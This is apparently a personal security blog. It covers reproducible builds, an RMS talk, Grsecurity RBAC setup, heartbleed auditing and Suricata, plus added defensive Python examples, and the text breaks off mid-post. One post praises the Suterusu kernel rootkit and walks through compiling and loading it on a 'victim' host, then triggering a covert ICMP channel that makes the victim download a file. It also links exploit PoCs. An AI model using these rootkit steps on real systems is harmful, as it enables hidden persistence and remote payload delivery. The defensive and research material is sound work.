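def build_tarball(src_dir: str, reproducible: bool) -> bytes:
    """Pack src_dir into a .tar.gz held in memory."""
    buf = io.BytesIO()
    if not reproducible:
        # Default packing: real mtimes and owner, and the current time in
        # the gzip header.
        with tarfile.open(fileobj=buf, mode="w:gz") as tar:
            tar.add(src_dir, arcname=".")
        return buf.getvalue()

    # Reproducible packing: fixed gzip header time, sorted traversal and
    # normalized headers.
    with gzip.GzipFile(fileobj=buf, mode="wb", mtime=0) as gz:
        with tarfile.open(fileobj=gz, mode="w") as tar:
            for root, dirs, files in os.walk(src_dir):
                dirs.sort()
                for name in sorted(files):
                    path = os.path.join(root, name)
                    tar.add(path, arcname=os.path.relpath(path, src_dir),
                            filter=normalize)
    return buf.getvalue()


def write_sources(out_dir: str, build_time: int) -> None:
    """Constructed build output: the same two files every time, but with
    the mtime a compiler run at `build_time` would have left behind."""
    files = {
        "main.o": b"\x7fELF constructed sample object, not a real binary\n",
        "README": b"hello, reproducible world\n",
    }
    for name, data in files.items():
        path = os.path.join(out_dir, name)
        with open(path, "wb") as fh:
            fh.write(data)
        os.utime(path, (build_time, build_time))
    os.utime(out_dir, (build_time, build_time))


def simulate_two_builds(reproducible: bool) -> tuple:
    """Build identical sources twice, one minute apart, and return the
    SHA-256 of each resulting tarball."""
    digests = []
    for build_time in (1_400_000_000, 1_400_000_060):
        with tempfile.TemporaryDirectory() as tmp:
            out_dir = os.path.join(tmp, "out")
            os.mkdir(out_dir)
            write_sources(out_dir, build_time)
            blob = build_tarball(out_dir, reproducible)
            digests.append(hashlib.sha256(blob).hexdigest())
    return tuple(digests)


if __name__ == "__main__":
    for mode in (False, True):
        first, second = simulate_two_builds(mode)
        label = "normalized" if mode else "default   "
        verdict = "MATCH" if first == second else "DIFFER"
        print("%s: build1=%s... build2=%s... %s"
              % (label, first[:16], second[:16], verdict))
```

Real build systems have more sources of variance than this (embedded build paths, compiler randomness, locale-dependent sort order), which is why projects like Debian's reproducible-builds effort fix the whole environment rather than only the packaging step; the comparison of independently produced hashes is the same idea.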
<br />
By the way, another reason I love Debian is the <a href="http://mempo.org/" target="_blank">Mempo</a> project;-) We need your hands..fuck off, NSA!<br /><br /><span style="color: #3d85c6;"><a href="http://media.ccc.de/browse/congress/2014/31c3_-_6123_-_en_-_saal_1_-_201412291130_-_freedom_in_your_computer_and_in_the_net_-_richard_stallman.html" target="_blank"><span style="font-size: large;"><b>Freedom in your computer and in the net(click me)</b></span></a></span><br />
<br />
<br />Fascinating free speech from RMS! My wife believes that to be idealistic is to be realistic...are we talking about a leap of faith? Sometimes, faith is all we have left;-) RMS is one of the most respectable men. His philosophy inspired me to start using GNU/Linux. Phrack inspired me to be a cybersec dude....<br />
<br />
<br />
<br />RMS talked about a few important things at 31C3:<br />
1, The differences between Free Software and open source. Free Software is more concerned with the ethics of libre software, while open source only emphasizes practical matters like code quality or cost.<br />
<br />
2, The security aspect. Free Software is more secure than closed software. Microsoft sends the NSA information about Windows bugs before they fix them; maybe other vendors( of closed-source products) do the same thing.<br />
<br />
3, RMS thinks all universities should teach reverse engineering. It's a good choice when you have to explore something in a closed-source world.<br />
<br />
4, RMS said "<span style="font-size: large;"><span style="color: lime;">...also the software they teach students to use must be free, because the school has a social mission to educate good citizens of a society that is strong, capable, independent, cooperating and free..</span></span>". Damn..I was touched. I've been asking myself a question for a long time: why would I support FSF and EFF in the first place? Probably I can say it now: it's worth it. Making the public benefit from it, and educating the public about free software and digital privacy, are so important in the information age.<br />
<br />
btw: Hope I can make it to 31C3.<br />
<br />
May the L0rd's hacking spirit guide us in 2015!<br />
<br />
<span style="font-size: large;"><b>An awesome linux kernel rootkit: Suterusu</b></span> (2014-08-10)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjceRK14AQwcMH_y23aA4ygPVNt_yXEVmVs7phztkVQmrkyAahPTtIXQfpyUoZaKCp820ZT0gUEkWjat1JH9HIKG7GmpDz6ZjfZFGgTBCO1-3_sziemCEAmlfi93sve0S2OfykAjw/s1600/rootkit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjceRK14AQwcMH_y23aA4ygPVNt_yXEVmVs7phztkVQmrkyAahPTtIXQfpyUoZaKCp820ZT0gUEkWjat1JH9HIKG7GmpDz6ZjfZFGgTBCO1-3_sziemCEAmlfi93sve0S2OfykAjw/s1600/rootkit.jpg" height="236" width="320" /></a></div>
<br />
I've been fuc*ing busy since I left SuSE about two months ago. I have a lot of time to hack/learn anything I want. Well, rootkits are one of my TODO items, as always. I wrote a <a href="http://citypw.blogspot.com/2014/02/simple-linux-rootkit-on-debian-with.html" target="_blank">dumb rootkit</a> half a year ago. It uses a good old method to hide files: hijacking some syscalls. There's a better solution called "inline hook". <a href="https://github.com/mncoppola/suterusu" target="_blank">Suterusu</a> is the one that implements an inline hook framework. I don't want to explain the details of how Suterusu is implemented, 'cuz no one( in most cases) would do the job better than the original author: Michael Coppola already wrote a good article, "<a href="http://poppopret.org/2013/01/07/suterusu-rootkit-inline-kernel-function-hooking-on-x86-and-arm/" target="_blank">Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM</a>".<br />
<br />
I always want to make some open source rootkits work on the latest version of GNU/Linux. Damn...I'd be <span data-dobid="hdw">exhausted if I really did that. There are a bunch of rootkits( adore-ng, ddrk, kbeast-v1, wnps, etc) out there that have been out of date for years. Although you might find some "modern" ones like <a href="http://r00tkit.me/" target="_blank">maK_it</a>, <a href="http://kernel-rootkit-2.6.32/">kernel-rootkit-2.6.32</a>, etc...but..there's always an annoying "but"...these rootkits either lack an inline hook framework or can't support a diverse set of Linux kernel versions. I've tested Suru on a dozen different Linux kernels, from 2.6.35 to 3.13.1. Now I'm going to share two stories of mine( of course, they're Suru-related;-)):</span><br />
<br />
<span data-dobid="hdw">1, A friend asked for advice about rootkit selection; of course I'd never hesitate to tell him to use Suru. When he tried to use it, he found out he couldn't compile it on kernel-3.14.1. Then I modified a few lines of code and it worked.</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">2, Another friend( a pentester) asked me if I could make any rootkit work on CentOS 6.5 with 2.6.32-431.el6 x86_64. I tried Suru and found out it didn't support 2.6.32 yet. Then I added less than 100 LOC and it worked.</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">Suru is an awesome rootkit. I'm sure a lot of people are using it. Today I found out about two features of Suru called "ICMP" and "DLEXEC" that I had never looked into. A friend( still that pentester) told me it can be used as a covert channel to transfer files. I wrote a <a href="https://raw.githubusercontent.com/citypw/suterusu/master/test/trigger_icmp_covert.py" target="_blank">triggering program</a> that crafts a specific ICMP header/payload and sends it to the "victim server". When the victim receives the packet, it downloads a file from a specific server.</span><br />
<br />
<span data-dobid="hdw">---------------------------------------------------------------------</span><br />
<span data-dobid="hdw">1. Download the <a href="https://github.com/citypw/suterusu/" target="_blank">Suterusu</a> for both "victim" and "attacker".</span><br />
<br />
<span data-dobid="hdw">2. The victim is using CentOS 6.5:</span><br />
<span data-dobid="hdw">[root@centos-rktesting ~]# <span style="color: lime;">uname -r</span><br />2.6.32-431.el6.x86_64</span><br />
<br />
<span data-dobid="hdw">2.1 Install some necessary packages:</span><br />
<span style="color: lime;"><span style="background-color: white;"><span data-dobid="hdw">yum install -y kernel-devel.x86_64 gcc vim</span></span></span><br />
<br />
<span data-dobid="hdw">2.2 Compile & load the rootkit:</span><br />
<span data-dobid="hdw">[root@centos-rktesting suterusu]# <span style="color: lime;">make linux-x86_64 KDIR=/usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ ICMP=y DLEXEC=y</span><br />make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ -D_CONFIG_DLEXEC_ -D_CONFIG_ICMP_" -C /usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ M=/root/suterusu modules<br />make[1]: Entering directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'<br /> CC [M] /root/suterusu/main.o<br /> CC [M] /root/suterusu/util.o<br /> CC [M] /root/suterusu/module.o<br /> CC [M] /root/suterusu/dlexec.o<br /> CC [M] /root/suterusu/icmp.o<br /> LD [M] /root/suterusu/suterusu.o<br /> Building modules, stage 2.<br /> MODPOST 1 modules<br /> CC /root/suterusu/suterusu.mod.o<br /> LD [M] /root/suterusu/suterusu.ko.unsigned<br /> NO SIGN [M] /root/suterusu/suterusu.ko<br />make[1]: Leaving directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'</span><br />
<span data-dobid="hdw">[root@centos-rktesting suterusu]# <span style="color: lime;">insmod suterusu.ko</span><br /> </span><br />
<span data-dobid="hdw">3. The attacker can use any GNU/Linux distro you want; compile the file server and designate the file you want to be transferred:</span><br />
<span data-dobid="hdw">shawn@shawn-fortress /tmp/suterusu $ <span style="color: lime;">sudo ./a.out 8556 README.md </span><br />Bound to port 8556, waiting for connection...</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">3.1 Open a new terminal:</span><br />
<span data-dobid="hdw">shawn@shawn-fortress /tmp/suterusu $ <span style="color: lime;">cd test/</span><br />shawn@shawn-fortress /tmp/suterusu/test $ <span style="background-color: black;"><span style="color: lime;">ls</span></span><br />trigger_icmp_covert.py<br />shawn@shawn-fortress /tmp/suterusu/test $ <span style="color: lime;">./trigger_icmp_covert.py</span></span><br />
<br />
<span data-dobid="hdw">4. Go to the victim's machine and check:</span><br />
<span data-dobid="hdw">[root@centos-rktesting ~]# <span style="color: lime;">cat /root/.tmp</span></span><br />
<span data-dobid="hdw">Suterusu<br />========<br /><br />Typical compilation steps:</span><br />
<span data-dobid="hdw">...........................................................</span><br />
<span data-dobid="hdw">.................................................................</span><br />
<br />
<span data-dobid="hdw">---------------------------------------------------------------------</span><br />
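As a defender's complement to the demo above, here is an added example of mine (not part of Suterusu or its test script): an RFC 792 parser for ICMP echo messages that verifies the checksum and flags echo requests whose payload is not the pattern a normal ping tool emits. The packets are constructed inline; the "suspicious" one carries a made-up text payload and is not Suterusu's actual trigger format, which this post does not document. The baseline is an assumption about what normal pings look like (iputils fills the data with bytes equal to their offset after a 16-byte timestamp; Windows ping sends a fixed alphabet), so tune it to your own traffic.

```python
import struct

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_checksum(data: bytes) -> int:
    """RFC 792: one's complement of the one's complement sum of the 16-bit
    words, with a zero byte appended to odd-length data."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Build an echo request/reply with a correct checksum (used here only
    to construct the sample messages below)."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(message: bytes) -> dict:
    """Parse the ICMP header (IP header already stripped) and verify the
    checksum by recomputing it over the message with the field zeroed."""
    if len(message) < 8:
        raise ValueError("ICMP message shorter than 8 bytes")
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", message[:8])
    zeroed = message[:2] + b"\x00\x00" + message[4:]
    return {
        "type": icmp_type, "code": code, "id": ident, "seq": seq,
        "checksum_ok": icmp_checksum(zeroed) == csum,
        "payload": message[8:],
    }


def looks_like_standard_ping(payload: bytes) -> bool:
    """Assumed baseline: Windows ping's fixed alphabet, or iputils-style
    data where every byte after the 16-byte timestamp equals its offset."""
    if payload == WINDOWS_PING_DATA:
        return True
    return len(payload) > 16 and all(
        payload[i] == (i & 0xFF) for i in range(16, len(payload)))


def printable_runs(payload: bytes, min_len: int = 6) -> list:
    """Runs of printable ASCII in the payload (a host name, a path, a command)."""
    runs, cur = [], bytearray()
    for b in payload + b"\x00":
        if 0x20 <= b < 0x7F:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            runs.append(cur.decode("ascii"))
        cur = bytearray()
    return runs


def triage(messages: list) -> list:
    """Return (index, reasons) for every message worth a second look."""
    findings = []
    for i, msg in enumerate(messages):
        info = parse_icmp(msg)
        reasons = []
        if not info["checksum_ok"]:
            reasons.append("bad checksum")
        if (info["type"] == ICMP_ECHO_REQUEST
                and not looks_like_standard_ping(info["payload"])):
            reasons.append("non-standard echo payload")
            for run in printable_runs(info["payload"]):
                reasons.append("printable text: %r" % run)
        if reasons:
            findings.append((i, reasons))
    return findings


# Constructed samples: a Linux-style ping, a Windows-style ping, a made-up
# echo request carrying text, and an echo reply with a corrupted checksum.
SAMPLES = [
    build_echo(ICMP_ECHO_REQUEST, 0x1234, 1, bytes(16) + bytes(range(16, 56))),
    build_echo(ICMP_ECHO_REQUEST, 0x0001, 7, WINDOWS_PING_DATA),
    build_echo(ICMP_ECHO_REQUEST, 0xBEEF, 1, b"\x00\x01" + b"10.0.0.5:8556 README.md"),
    bytearray(build_echo(ICMP_ECHO_REPLY, 0x1234, 1, bytes(16) + bytes(range(16, 56)))),
]
SAMPLES[3][2] ^= 0xFF           # corrupt one checksum byte of the reply
SAMPLES[3] = bytes(SAMPLES[3])

if __name__ == "__main__":
    for index, reasons in triage(SAMPLES):
        print("message %d: %s" % (index, "; ".join(reasons)))
```

Feed it the ICMP portion of frames from a pcap or a raw socket listener; the point is that a host-based hook triggered by ICMP still has to receive a packet, and a packet whose echo payload carries structured text is cheap to spot at the network edge.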
<br />
<span data-dobid="hdw">That's it! Show time is over! It's quite simple, eh? I really appreciate that Michael Coppola released Suterusu under a <a href="https://raw.githubusercontent.com/mncoppola/suterusu/master/LICENSE" target="_blank">free/open source software license</a>. And I also thank him for bringing us good writings;-)</span><br />
<br />
<span data-dobid="hdw">btw: What's next? I'll probably go try some memory forensics, to see if I can hunt some rootkits;-) </span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">Have fun & good hunting!!!</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">May the L0rd's hacking spirit guide us!!!</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">Further readings:</span><br />
<span data-dobid="hdw">[1] RFC-792</span><br />
<span data-dobid="hdw">http://tools.ietf.org/html/rfc792</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">[2] Python documentation:</span><br />
<span data-dobid="hdw">https://docs.python.org/2/library/struct.html</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">[3] TCP/IP protocols</span><br />
<span data-dobid="hdw">http://www.protocols.com/pbook/tcpip3.htm</span><br />
<span data-dobid="hdw"><br /></span>
<span data-dobid="hdw">[4] Sock-RAW</span><br />
<span data-dobid="hdw">http://sock-raw.org/papers/sock_raw</span><br />
<br />
<span style="font-size: large;"><b>Simple Grsecurity RBAC policy with kernel 3.14.1 on Debian 7.4</b></span> (2014-05-14)<br />
Speaking of kernel hardening, I personally like AppArmor and I'm sick of SELinux( you know why). <a href="http://www.phrack.org/archives/issues/67/13.txt" target="_blank">pi3's paper in Phrack Issue 67</a> was the first place I met Grsecurity/PaX. I'll never forget that 30 seconds would help people build defense in depth;-) Then I went to read some Phrack papers from the good old hacking days that I had missed. Then I learned they are the original authors of ASLR...and much more. No doubt Grsecurity/PaX is one of the most respected old school communities......Note: Grsecurity/PaX doesn't use LSM, since LSM breaks the principle of building security in, which should treat security as a whole. I think it's time to explore....<br />
<br />
Download the <span style="color: lime;">kernel</span>:<br />
https://www.kernel.org/pub/linux/kernel/v3.x/linux-3.14.1.tar.xz<br />
<br />
Download the <span style="color: blue;">grsecurity</span> patch:<br />
https://www.grsecurity.net/test/grsecurity-3.0-3.14.3-201405121814.patch<br />
<br />
Patch the kernel with grsecurity:<br />
<pre>xz -d linux-3.14.1.tar.xz
tar xvf linux-3.14.1.tar
cd linux-3.14.1/
patch -p1 < ../grsecurity-3.0-3.14.3-201405121814.patch</pre>
You can use my kernel <span style="color: cyan;">config</span>:<br />
https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/debian-7.4-linux-3.14.1-grsec.config<br />
<br />
Or make your own config via "<span style="color: lime;">make menuconfig</span>". Then compile the kernel:<br />
<pre>make -j3 deb-pkg</pre>
It will build deb packages for you. All you need to do is install them:<br />
<pre>dpkg -i ../*.deb</pre>
Now the kernel part is done. Download <span style="color: lime;">gradm</span>( the RBAC administration utility):<br />
https://www.grsecurity.net/stable/gradm-3.0-201401291757.tar.gz<br />
<pre>tar zxvf gradm-3.0-201401291757.tar.gz
cd gradm/
make && make install</pre>
Reboot the machine:<br />
<pre>shutdown -r now</pre>
Now you need to set a bunch of <span style="color: red;">annoying</span> passwords:<br />
<pre>root@d6-test:/etc/grsec# gradm -P
Setting up grsecurity RBAC password
Password: 
Re-enter Password: 
Password written to /etc/grsec/pw.
root@d6-test:/etc/grsec# 
root@d6-test:/etc/grsec# gradm -P admin
Setting up password for role admin
Password: 
Re-enter Password: 
Password written to /etc/grsec/pw.
root@d6-test:/etc/grsec# 
root@d6-test:/etc/grsec# gradm -P shutdown
Setting up password for role shutdown
Password: 
Re-enter Password: 
Password written to /etc/grsec/pw.</pre>
Add this:<br />
https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/grsec_conf.a.out<br />
<br />
into the tail of /etc/grsec/policy.<br />
<br />
What I did in the above policy was create role shawn as a user, with some default policies, like /bin being executable only, etc.
Then I gave the binary /home/shawn/grsec_test/a.out read permission on /home/shawn/hello and write permission on /home/shawn/world, and running another shell is not allowed. You can use my code to test the policy:<br />
<br />
https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/apparmor_test.c<br />
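The test below is an added example of mine (not the apparmor_test.c linked above), written in Python, that does what such a test program needs to do: attempt each access the policy is meant to allow or deny, record the errno, and compare the outcome with what the policy text says. The target paths and the expected table follow the policy described above for role shawn; both are assumptions to adapt to your own policy. One caveat that matters for RBAC: the subject in a gradm policy is the executable, so when the test is a script the subject line has to name the interpreter (or a wrapper) rather than a.out, otherwise you are probing a different subject than the one you wrote rules for.

```python
import errno
import os
import subprocess

# Paths from the policy described above (assumed; change for your policy).
READ_TARGET = "/home/shawn/hello"
WRITE_TARGET = "/home/shawn/world"
SHELL = "/bin/sh"

DENIED_ERRNOS = {errno.EACCES, errno.EPERM}


def probe_open(path: str, flags: int) -> int:
    """open(2) the path with the given flags; 0 on success, else errno."""
    try:
        fd = os.open(path, flags)
    except OSError as exc:
        return exc.errno
    os.close(fd)
    return 0


def probe_exec(program: str) -> int:
    """Try to run `program -c true`; 0 if it ran and exited 0, errno if
    execve failed, -1 if it ran but exited non-zero."""
    try:
        subprocess.run([program, "-c", "true"], check=True,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except OSError as exc:            # ENOENT, EACCES, EPERM from execve
        return exc.errno
    except subprocess.CalledProcessError:
        return -1
    return 0


def classify(rc: int) -> str:
    """Map a probe result to what it means for the policy under test."""
    if rc == 0:
        return "allowed"
    if rc in DENIED_ERRNOS:
        return "denied"
    if rc == errno.ENOENT:
        return "missing"              # the test file was never created
    return "error:%s" % errno.errorcode.get(rc, rc)


def run_probes(read_target: str = READ_TARGET,
               write_target: str = WRITE_TARGET,
               shell: str = SHELL) -> dict:
    """Exercise every access the policy grants, plus the inverse accesses
    it should implicitly deny."""
    return {
        "read_hello": classify(probe_open(read_target, os.O_RDONLY)),
        "write_hello": classify(probe_open(read_target, os.O_WRONLY)),
        "read_world": classify(probe_open(write_target, os.O_RDONLY)),
        "write_world": classify(probe_open(write_target, os.O_WRONLY)),
        "exec_shell": classify(probe_exec(shell)),
    }


# What the policy text says should happen (my reading of the post's policy).
EXPECTED = {
    "read_hello": "allowed",
    "write_hello": "denied",
    "read_world": "denied",
    "write_world": "allowed",
    "exec_shell": "denied",
}


def mismatches(observed: dict) -> list:
    """Probes whose observed outcome differs from EXPECTED."""
    return [name for name in EXPECTED if observed.get(name) != EXPECTED[name]]


if __name__ == "__main__":
    results = run_probes()
    for name, outcome in results.items():
        print("%-12s %s" % (name, outcome))
    bad = mismatches(results)
    print("policy holds" if not bad else "policy MISMATCH: " + ", ".join(bad))
```

Run it once with the RBAC system disabled (gradm -D) to confirm every probe is "allowed" under plain DAC, then with the policy enabled; only the second run proves the policy, and a "missing" outcome means the test files were never created rather than that the policy denied anything.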
<br />
btw: I tested the <a href="http://pastebin.com/yTSFUBgZ" target="_blank">PoC of CVE-2014-0196</a> on kernel-3.13 and it crashed the kernel. I tested it on kernel-3.14.1 with Grsecurity and it doesn't work. But 3.14.1 should be affected by this issue...ah, I think Grsecurity works in some "mysterious" way to prevent this PoC. I'll dig deeper into this amazing hardening implementation.<br />
<br />Further readings:<br />
[1] Grsecurity wiki<br />
http://en.wikibooks.org/wiki/Grsecurity<br />
<br />
[2] Documentation for the PaX project<br />
https://pax.grsecurity.net/docs/<br />
<br />
[3] Grsecurity Blog<br />
https://forums.grsecurity.net/viewforum.php?f=7<br />
<br />
<span style="font-size: large;"><b>Audit: don't only focus on the heartbleed issue</b></span> (2014-04-16)<br />
I received the info about the heartbleed issue on Apr 8 and found out that SLES-11 is using the OpenSSL 0.9.8 branch, which is not vulnerable to heartbleed. Then I patched it for OpenSuSE 13.1/12.3. It was easy because the patch was already there.<br />
<br />
After an exciting and crazy week, people are calming down and planning to, or already starting to, audit their systems. But there is something you might miss. Older versions of OpenSSL( like 0.9.8) might not be affected by the heartbleed issue, but that doesn't mean you are secure. Don't forget that old OpenSSL is still vulnerable to BEAST( 2011), CRIME( 2012) and<a href="http://www.isg.rhul.ac.uk/tls/" target="_blank"> Lucky-thirteen</a>( 2013). I do believe Lucky-thirteen is far more dangerous than heartbleed; we just don't know. Once you start the audit, plz upgrade OpenSSL to the latest version. If you are using 0.9.8, plz upgrade to 0.9.8y, which is not vulnerable to the Lucky-13 issue.<br />
<br />
Fixing the heartbleed issue for a website is much easier than for networking devices( Firewall, UTM, SSL/IPSEC VPN, etc) and 3rd-party software. This is definitely going to have a long-term impact.<br />
<br />
I'd like to share some materials( you might already know them).<br />
<br />
Heartbleed issue technical analysis:<br />
https://www.getpantheon.com/heartbleed-fix<br />
http://blog.ioactive.com/2014/04/bleeding-hearts.html<br />
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html<br />
<br />
<br />
I totally agree with the last point from this article:<br />
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html<br />
<br />
Those major companies that rely heavily on the open source TLS implementations( OpenSSL, GnuTLS, etc) should give them funding, to make them more secure and stable.<br />
<br />
EFF is always right about how to fight against mass surveillance by agencies like NSA. PFS is so fuc*ing important, especially today. I think we should use TLS 1.2.<br />
<br />
https://www.eff.org/deeplinks/2014/04/wild-heart-were-intelligence-agencies-using-heartbleed-november-2013<br />
https://www.eff.org/deeplinks/2014/04/why-web-needs-perfect-forward-secrecy<br />
https://www.eff.org/deeplinks/2013/08/pushing-perfect-forward-secrecy-important-web-privacy-protection<br />
https://www.eff.org/deeplinks/2011/11/long-term-privacy-forward-secrecy<br />
<br />
The performance hit is probably one of the reasons that, although PFS is so important, only a few websites are using it:<br />
http://nmav.gnutls.org/2011/12/price-to-pay-for-perfect-forward.html<br />
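As an added example (mine, not from EFF or any of the linked articles) of the kind of check that belongs in such an audit: classify cipher suites by whether their key exchange gives forward secrecy and whether they belong to the RC4/CBC families that BEAST and Lucky 13 target, and build a TLS 1.2-minimum client context that offers only forward-secret AEAD suites. The suite list is constructed; audit_local_openssl() runs the same classification over whatever OpenSSL the local Python is linked with. Names follow OpenSSL's conventions plus the TLS 1.3 TLS_* names, and the classification by name fragments is an assumption that holds for those conventions, not a general cipher database.

```python
import ssl

# Constructed list of suite names, as a server might be configured with.
SAMPLE_CIPHERS = [
    "ECDHE-RSA-AES128-GCM-SHA256",
    "TLS_AES_256_GCM_SHA384",
    "DHE-RSA-AES256-SHA",
    "AES128-SHA",
    "RC4-SHA",
    "ECDHE-RSA-DES-CBC3-SHA",
]


def is_forward_secret(name: str) -> bool:
    """Ephemeral (EC)DH key exchange: ECDHE-/DHE- in OpenSSL names; every
    TLS 1.3 suite (TLS_*) is ephemeral by design."""
    n = name.upper()
    return n.startswith("TLS_") or n.startswith(("ECDHE-", "DHE-", "EDH-"))


def audit_cipher(name: str) -> list:
    """Return the problems with one suite; an empty list means acceptable."""
    n = name.upper()
    issues = []
    if not is_forward_secret(n):
        issues.append("no forward secrecy (static RSA key exchange)")
    if "RC4" in n:
        issues.append("RC4 stream cipher")
    if "DES" in n:                       # matches DES and 3DES (DES-CBC3)
        issues.append("DES/3DES")
    if "NULL" in n or "EXP" in n:
        issues.append("NULL or export-grade cipher")
    if "MD5" in n:
        issues.append("MD5 MAC")
    if not n.startswith("TLS_") and not any(
            aead in n for aead in ("GCM", "CCM", "CHACHA20")):
        issues.append("non-AEAD (legacy CBC or stream construction: "
                      "BEAST/Lucky 13 class)")
    return issues


def audit_ciphers(names) -> dict:
    """Map each offending suite name to its list of issues."""
    report = {}
    for name in names:
        issues = audit_cipher(name)
        if issues:
            report[name] = issues
    return report


def acceptable(names) -> list:
    """Suites with no findings, in the original preference order."""
    return [n for n in names if not audit_cipher(n)]


def hardened_context() -> ssl.SSLContext:
    """Client context that refuses anything below TLS 1.2 and offers only
    forward-secret AEAD suites (TLS 1.3 suites stay enabled by default)."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:!aNULL:!MD5:!RC4")
    return ctx


def audit_local_openssl() -> dict:
    """Run the same audit over the suites the local OpenSSL offers by default."""
    ctx = ssl.create_default_context()
    return audit_ciphers(c["name"] for c in ctx.get_ciphers())


if __name__ == "__main__":
    for name, issues in audit_ciphers(SAMPLE_CIPHERS).items():
        print(name, "->", "; ".join(issues))
    print("acceptable:", acceptable(SAMPLE_CIPHERS))
    print("hardened context offers:",
          [c["name"] for c in hardened_context().get_ciphers()])
```

The same classification applies to a server's configured list: anything the audit flags is a suite an attacker can be negotiated down to, so the fix is to remove it from the server's cipher string rather than to hope clients prefer the good ones.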
<br />
Test top-1m websites:<br />
https://github.com/musalbas/heartbleed-masstest<br />
<br />
C:<br />
https://github.com/robertdavidgraham/heartleech<br />
<br />
Client PoC:<br />
https://github.com/Lekensteyn/pacemaker<br />
<br />
---------------------------------------------------------<br />
One more thing, to those who are still complaining that the security of free/open source software is worse than that of closed software. Well, I don't want to argue here. But I'm giving you people three options:<br />
1, Join the community and help the FOSS community do code audits.<br />
2, Make some donations to the organizations who really care about your privacy and do the code audits for us. Like EFF; I'm fuc*ing proud to be a member of EFF.....<br />
3, G O H O M E A N D F U C K Y O U R S E L F ! ! !<br />
<br />
<span style="font-size: large;"><b>Suricata's file extraction on Debian GNU/Linux</b></span> (2014-03-31)<br />
<a href="http://suricata-ids.org/" target="_blank">Suricata</a> is a high performance open source IDS/IPS project. I used it a long time ago, around 2010, when it was released. I've been playing with Snort recently and then found that Suricata has a great feature: <a href="https://redmine.openinfosecfoundation.org/projects/suricata/wiki/File_Extraction" target="_blank">File extraction</a>. It'd be helpful to those who want to get malware samples from an IDS. Anyway, like in the old days, I want to test it on my own and see how it works on Debian. First things first, I need to build it and see if it works.<br />
<br />
Download the latest version of the <a href="http://www.debian.org/distrib/netinst.en.html" target="_blank">small installation ISO image</a>. I need to clarify my testing environment: Debian is running on my virtual machine, which has two NICs, <span style="color: red;">eth0</span> and <span style="color: red;">eth1</span>. Interface eth0 is running in NAT mode and eth1 in bridge mode. Debian doesn't assign any IP addr to eth1.<br />
<br />
Because our <span style="color: #38761d;">Debian</span> is the small installation, we have to install some dependency packages via a simple apt-get:<br />
<br />
#<span style="color: blue;">apt-get</span> install vim openssh-server ethtool libpcap-dev libnfnetlink-dev libnetfilter-queue-dev libdnet-dev libdumbnet-dev libpcre3-dev libpcre3-dbg bison flex make zlib1g-dev autoconf libtool libnss3-dev libnspr4-dev libjansson4 libjansson-dev libyaml-dev libcap-ng0 libcap-ng-dev libnet1-dev libmagic-dev build-essential<br />
<br />
Get the source code of <span style="color: blue;">Suricata</span>:<br />
#cd /tmp<br />
#wget http://www.openinfosecfoundation.org/download/suricata-2.0.tar.gz<br />
#tar zxvf suricata-2.0.tar.gz<br />
#cd suricata-2.0<br />
<br />
Compile and install:<br />
#./configure --enable-nfqueue --enable-gccprotect --prefix=/usr/local/suricata --localstatedir=/var<br />
#make -j3<br />
#make install-full<br />
<br />
Edit suricata.yaml:<br />
1, Set the request/response body limits a little bigger:<br />
request-body-limit: 1gb #3072<br />
response-body-limit: 1gb #3072<br />
<br />
2, Enable file extraction:<br />
<pre>- file-store:
    enabled: yes        # set to yes to enable
    log-dir: files      # directory to store the files
    force-magic: no     # force logging magic on all stored files
    force-md5: no       # force logging of md5 checksums
    waldo: file.waldo   # waldo file to store the file_id across runs

# output module to log files tracked in a easily parsable json format
- file-log:
    enabled: yes
    filename: files-json.log
    append: yes
    #filetype: regular # 'regular', 'unix_stream' or 'unix_dgram'</pre>
<br />
3, Add our "test" rule file( test.rules in this case) into the section "default-rule-path:", like:<br />
<pre>default-rule-path: /usr/local/suricata/etc/suricata/rules
rule-files:
  - test.rules
  - botcc.rules</pre>
<br />
Create a rule file:<br />
/usr/local/suricata/etc/suricata/rules/test.rules<br />
<br />
Add one line into test.rules( to save any jpg files) :<br />
